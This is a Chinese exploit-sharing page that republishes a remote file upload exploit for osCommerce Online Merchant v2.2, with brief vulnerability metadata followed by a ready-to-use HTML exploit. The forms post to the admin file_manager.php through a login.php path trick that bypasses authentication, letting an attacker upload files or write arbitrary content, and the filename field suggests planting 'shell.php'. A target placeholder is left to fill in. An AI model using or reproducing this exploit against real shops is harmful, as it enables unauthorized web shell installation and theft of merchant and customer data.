黑客(hacker)可以通过漏洞进行相应的破坏,在我国,每年因黑客入侵、造成了巨大的经济损
失。商业信息丢失、客户资料被盗,数据损坏、网络攻击、等.....
Oscommerce Online Merchant v2.2 - Remote File Upload
Oday来源:黑白前线 Oday作者:佚名 更新时间:2010-9-1 Oday点击: (在线Oday订阅)
Oday摘要: 发布日期:2010-05.31发布作者:MasterGipy影响版本:OscommerceOnlineMerchantv2.2官方地址:http://www.oscommerce.com漏洞描述:OscommerceOnlineMerchantv2.2程序存在文件上传漏洞。vulnerablefile:/admin/file_manager.php[REMOTEFILEUPLOADVULNERAB
上一篇文章: Kindeditor遍历目录0DAY
- 发布日期:2010-05.31
- 发布作者:MasterGipy
- 影响版本:Oscommerce Online Merchant v2.2
- 官方地址: http://www.oscommerce.com
- 漏洞描述: Oscommerce Online Merchant v2.2程序存在文件上传漏洞。
- vulnerable file: /admin/file_manager.php
[REMOTE FILE UPLOAD VULNERABILITY]
[$] Exploit:
- <html><head><title>Oscommerce Online Merchant v2.2 - Remote File Upload </title></head>
- <br><br><u>UPLOAD FILE:</u><br>
- <form name="file" action="http://<-- CHANGE HERE -->/admin/file_manager.php/login.php?action=processuploads" method="post" enctype="multipart/form-data">
- <input type="file" name="file_1"><br>
- <input name="submit" type="submit" value=" Upload " >
- </form>
- <br><u>CREATE FILE:</u><br>
- <form name="new_file" action="http://<-- CHANGE HERE -->/admin/file_manager.php/login.php?action=save" method="post">
- FILE NAME:<br>
- <input type="text" name="filename"> (ex. shell.php)<br>FILE CONTENTS:<br>
- <textarea name="file_contents" wrap="soft" cols="70" rows="10"></textarea>
- <input name="submit" type="submit" value=" Save " >
- </form>
- </html>